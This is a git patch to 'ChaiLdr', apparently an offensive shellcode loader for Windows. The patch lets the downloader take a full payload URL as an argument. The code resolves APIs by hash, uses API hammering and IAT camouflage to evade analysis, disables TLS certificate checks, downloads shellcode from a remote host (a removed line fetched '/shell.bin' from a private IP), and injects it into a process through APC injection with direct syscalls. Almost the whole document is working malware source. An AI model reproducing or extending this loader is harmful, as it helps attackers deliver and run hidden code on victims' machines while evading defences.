From 9b6e8ecfd52d3f04d19b10f5a133045c2573ccd4 Mon Sep 17 00:00:00 2001 From: come2arkside <69916703+come2darkside@users.noreply.github.com> Date: Fri, 17 May 2024 16:57:15 +0300 Subject: [PATCH] Can get full path url as one argument --- ChaiLdr/downloader.c | 161 ++++++++++++++++---------------------- ChaiLdr/include/common.h | 3 +- ChaiLdr/include/typedef.h | 4 +- ChaiLdr/inject.c | 4 + ChaiLdr/main.c | 69 +++++++++------- 5 files changed, 119 insertions(+), 122 deletions(-) diff --git a/ChaiLdr/downloader.c b/ChaiLdr/downloader.c index cb1b029..84a65f5 100644 --- a/ChaiLdr/downloader.c +++ b/ChaiLdr/downloader.c @@ -5,104 +5,81 @@ #include "include/common.h" #define InternetOpenA_JOAA 0x154BE30F -#define InternetConnectA_JOAA 0x51CC39CF -#define HttpOpenRequestA_JOAA 0x03084192 -#define InternetSetOptionA_JOAA 0xD8C64F22 -#define HttpSendRequestA_JOAA 0xA14CFDA5 +#define InternetOpenUrlA_JOAA 0x36430125 +#define InternetSetOptionA_JOAA 0xD8C64F22 #define InternetReadFile_JOAA 0xF1FF9642 -#define InternetCloseHandle_JOAA 0x9E679473 +#define InternetCloseHandle_JOAA 0x9E679473 #define GetTickCount64_JOAA 0x00BB616E -#define LoadLibraryA_JOAA 0x54C1D227 +#define LoadLibraryA_JOAA 0x54C1D227 #define KERNEL32DLL_JOAA 0xFD2AD9BD #define WININETDLL_JOAA 0x668CA1EC API_HASHING g_Api = { 0 }; -DWORD Download(char** response, PVOID url, PVOID endpoint, BOOL ssl) +DWORD Download(char** response, char* url, BOOL ssl) { - HANDLE kernerl32_handle = GetModuleHandleH(KERNEL32DLL_JOAA); - g_Api.pLoadLibraryA = (fnLoadLibraryA)GetProcAddressH(kernerl32_handle, LoadLibraryA_JOAA); - - HANDLE wininet_handle = g_Api.pLoadLibraryA("wininet.dll"); - - g_Api.pInternetOpenA = (fnInternetOpenA)GetProcAddressH(wininet_handle, InternetOpenA_JOAA); - g_Api.pInternetConnectA = (fnInternetConnectA)GetProcAddressH(wininet_handle, InternetConnectA_JOAA); - g_Api.pHttpOpenRequestA = (fnHttpOpenRequestA)GetProcAddressH(wininet_handle, HttpOpenRequestA_JOAA); - g_Api.pInternetSetOptionA = (fnInternetSetOptionA)GetProcAddressH(wininet_handle, InternetSetOptionA_JOAA); - g_Api.pHttpSendRequestA = (fnHttpSendRequestA)GetProcAddressH(wininet_handle, HttpSendRequestA_JOAA); - g_Api.pInternetReadFile = (fnInternetReadFile)GetProcAddressH(wininet_handle, InternetReadFile_JOAA); - g_Api.pInternetCloseHandle = (fnInternetCloseHandle)GetProcAddressH(wininet_handle, InternetCloseHandle_JOAA); - g_Api.pGetTickCount64 = (fnGetTickCount64)GetProcAddressH(GetModuleHandleH(KERNEL32DLL_JOAA), GetTickCount64_JOAA); - - - if (g_Api.pGetTickCount64 == NULL) printf("GetTickCount64\n"); - if (g_Api.pInternetOpenA == NULL) printf("InternetOpenA\n"); - if (g_Api.pInternetConnectA == NULL) printf("InternetConnectA\n"); - if (g_Api.pHttpOpenRequestA == NULL) printf("HttpOpenRequestA\n"); - if (g_Api.pInternetSetOptionA == NULL) printf("InternetSetOptionA\n"); - if (g_Api.pHttpSendRequestA == NULL) printf("HttpSendRequestA\n"); - if (g_Api.pInternetReadFile == NULL) printf("InternetReadFile\n"); - if (g_Api.pInternetCloseHandle == NULL) printf("InternetCloseHandle\n"); - - - DWORD bytesRead = 0; - DWORD totalBytesRead = 0; - const DWORD bufferSize = 1024; - char buffer[1024]; - - HINTERNET hInternet = g_Api.pInternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); - - if (hInternet == NULL) - return -1; - - // connect to remote server - HINTERNET hConnect = NULL; - if(ssl) - hConnect = g_Api.pInternetConnectA(hInternet, url, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, (DWORD_PTR)NULL); - else - hConnect = g_Api.pInternetConnectA(hInternet, url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, (DWORD_PTR)NULL); - - if (hConnect == NULL) - { - g_Api.pInternetCloseHandle(hInternet); - return -1; - } - - HINTERNET hRequest = NULL; - if(ssl) - hRequest = g_Api.pHttpOpenRequestA(hConnect, "GET", endpoint , NULL, NULL, NULL, (INTERNET_FLAG_SECURE | INTERNET_FLAG_DONT_CACHE), 0); - else - hRequest = g_Api.pHttpOpenRequestA(hConnect, "GET", endpoint, NULL, NULL, NULL, (INTERNET_FLAG_DONT_CACHE), 0); - - DWORD flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID; - - g_Api.pInternetSetOptionA(hRequest, INTERNET_OPTION_SECURITY_FLAGS,&flags,sizeof(flags)); - - BOOL status = g_Api.pHttpSendRequestA(hRequest,NULL,0,NULL,0); - - DWORD dwBytesRead = NULL; - SIZE_T sSize = 0; - - *response = (char*)malloc(1); - do { - if (g_Api.pInternetReadFile(hRequest, buffer, bufferSize, &bytesRead)) { - if (bytesRead > 0) { - char* temp = (char*)realloc(*response, totalBytesRead + bytesRead + 1); - if (temp == NULL) { - return NULL; - } - else { - *response = temp; - memcpy(*response + totalBytesRead, buffer, bytesRead); - totalBytesRead += bytesRead; - (*response)[totalBytesRead] = '\0'; - } - } - } - } while (bytesRead > 0); - - g_Api.pInternetCloseHandle(hInternet); - g_Api.pInternetCloseHandle(hRequest); - return totalBytesRead; -} \ No newline at end of file + HANDLE kernerl32_handle = GetModuleHandleH(KERNEL32DLL_JOAA); + g_Api.pLoadLibraryA = (fnLoadLibraryA)GetProcAddressH(kernerl32_handle, LoadLibraryA_JOAA); + + HANDLE wininet_handle = g_Api.pLoadLibraryA("wininet.dll"); + + g_Api.pInternetOpenA = (fnInternetOpenA)GetProcAddressH(wininet_handle, InternetOpenA_JOAA); + g_Api.pInternetOpenUrlA = (fnInternetOpenUrlA)GetProcAddressH(wininet_handle, InternetOpenUrlA_JOAA); + g_Api.pInternetSetOptionA = (fnInternetSetOptionA)GetProcAddressH(wininet_handle, InternetSetOptionA_JOAA); + g_Api.pInternetReadFile = (fnInternetReadFile)GetProcAddressH(wininet_handle, InternetReadFile_JOAA); + g_Api.pInternetCloseHandle = (fnInternetCloseHandle)GetProcAddressH(wininet_handle, InternetCloseHandle_JOAA); + g_Api.pGetTickCount64 = (fnGetTickCount64)GetProcAddressH(GetModuleHandleH(KERNEL32DLL_JOAA), GetTickCount64_JOAA); + + if (g_Api.pGetTickCount64 == NULL) printf("GetTickCount64\n"); + if (g_Api.pInternetOpenA == NULL) printf("InternetOpenA\n"); + if (g_Api.pInternetOpenUrlA == NULL) printf("InternetOpenUrlA\n"); + + if (g_Api.pInternetSetOptionA == NULL) printf("InternetSetOptionA\n"); + if (g_Api.pInternetReadFile == NULL) printf("InternetReadFile\n"); + if (g_Api.pInternetCloseHandle == NULL) printf("InternetCloseHandle\n"); + + DWORD bytesRead = 0; + DWORD totalBytesRead = 0; + const DWORD bufferSize = 1024; + char buffer[1024]; + + HINTERNET hInternet = g_Api.pInternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); + + if (hInternet == NULL) + return -1; + + // Open URL directly + HINTERNET hUrl = g_Api.pInternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_DONT_CACHE | (ssl ? INTERNET_FLAG_SECURE : 0), 0); + + if (hUrl == NULL) + { + g_Api.pInternetCloseHandle(hInternet); + return -1; + } + + DWORD flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID; + g_Api.pInternetSetOptionA(hUrl, INTERNET_OPTION_SECURITY_FLAGS, &flags, sizeof(flags)); + + *response = (char*)malloc(1); + do { + if (g_Api.pInternetReadFile(hUrl, buffer, bufferSize, &bytesRead)) { + if (bytesRead > 0) { + char* temp = (char*)realloc(*response, totalBytesRead + bytesRead + 1); + if (temp == NULL) { + return NULL; + } + else { + *response = temp; + memcpy(*response + totalBytesRead, buffer, bytesRead); + totalBytesRead += bytesRead; + (*response)[totalBytesRead] = '\0'; + } + } + } + } while (bytesRead > 0); + + g_Api.pInternetCloseHandle(hUrl); + g_Api.pInternetCloseHandle(hInternet); + return totalBytesRead; +} diff --git a/ChaiLdr/include/common.h b/ChaiLdr/include/common.h index 82bffcc..b238fe7 100644 --- a/ChaiLdr/include/common.h +++ b/ChaiLdr/include/common.h @@ -23,6 +23,7 @@ typedef struct _API_HASHING { fnInternetReadFile pInternetReadFile; fnInternetCloseHandle pInternetCloseHandle; fnLoadLibraryA pLoadLibraryA; + fnInternetOpenUrlA pInternetOpenUrlA; } API_HASHING, * PAPI_HASHING; // inject.c @@ -38,7 +39,7 @@ HMODULE GetModuleHandleH(DWORD dwModuleNameHash); BOOL ApiHammering(DWORD Stress); // downloader.c -DWORD Download(char** response, PVOID url, PVOID endpoint, BOOL ssl); +DWORD Download(char** response, char* url, BOOL ssl); //iatcamo.c VOID IatCamouflage(); \ No newline at end of file diff --git a/ChaiLdr/include/typedef.h b/ChaiLdr/include/typedef.h index 113ac5c..09dcb2b 100644 --- a/ChaiLdr/include/typedef.h +++ b/ChaiLdr/include/typedef.h @@ -19,4 +19,6 @@ typedef BOOL(WINAPI* fnInternetReadFile)(HINTERNET hFile, LPVOID lpBuffer, DWORD typedef BOOL(WINAPI* fnInternetCloseHandle)(HINTERNET hInternet); -typedef HMODULE(WINAPI* fnLoadLibraryA)(LPCSTR lpLibFileName); \ No newline at end of file +typedef HMODULE(WINAPI* fnLoadLibraryA)(LPCSTR lpLibFileName); + +typedef HINTERNET(WINAPI* fnInternetOpenUrlA)(HINTERNET hInternet, LPCSTR lpszUrl, LPCSTR lpszHeaders, DWORD dwHeadersLength, DWORD dwFlags, DWORD_PTR dwContext); diff --git a/ChaiLdr/inject.c b/ChaiLdr/inject.c index 653e341..3c285b3 100644 --- a/ChaiLdr/inject.c +++ b/ChaiLdr/inject.c @@ -13,6 +13,10 @@ BOOL ApcInjectionViaSyscalls(HANDLE hProcess, HANDLE hThread, PVOID pPayload, SI // Allocating memory if ((STATUS = Sw3NtAllocateVirtualMemory(hProcess, &pAddress, 0, &sPayloadSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) != 0) { + printf("[!] hProcess : %d \n", hProcess); + printf("[!] pAddress : %p \n", pAddress); + printf("[!] sPayloadSize : %d \n", sPayloadSize); + printf("[!] NtAllocateVirtualMemory Failed With Error : 0x%0.8X \n", STATUS); goto _Cleanup; } diff --git a/ChaiLdr/main.c b/ChaiLdr/main.c index beb75a7..9427381 100644 --- a/ChaiLdr/main.c +++ b/ChaiLdr/main.c @@ -1,35 +1,48 @@ #include +#include +#include #include "include/common.h" -int main() +int main(int argc, char* argv[]) { - ApiHammering(2000); - - IatCamouflage(); - - unsigned char* pPayload = NULL; - - PSTR url = "192.168.231.130"; - PSTR endpoint = "/shell.bin"; - - SIZE_T sSize = Download(&pPayload, url, endpoint, FALSE); - - if (sSize == -1) - goto _Cleanup; - //Printing shellcode - /*printf("[*] Shellcode: \n"); - for (SIZE_T i = 0; i < sSize; i++) - { - printf("%02X ", pPayload[i]); - } - printf("\n");*/ - - if (InitiateInjection(pPayload,sSize)) - { - return -1; - } + if (argc != 2) { + fprintf(stderr, "Usage: %s \n", argv[0]); + return -1; + } -_Cleanup: - return 0; + PSTR fullUrl = argv[1]; + + + + if (fullUrl == NULL) { + fprintf(stderr, "Invalid format. Expected format: \n"); + return -1; + } + + ApiHammering(2000); + + IatCamouflage(); + + unsigned char* pPayload = NULL; + SIZE_T sSize = Download(&pPayload, fullUrl, FALSE); + + if (sSize == -1) + goto _Cleanup; + + // Printing shellcode + /*printf("[*] Shellcode: \n"); + for (SIZE_T i = 0; i < sSize; i++) + { + printf("%02X ", pPayload[i]); + } + printf("\n");*/ + + if (InitiateInjection(pPayload, sSize)) + { + return -1; + } + +_Cleanup: + return 0; }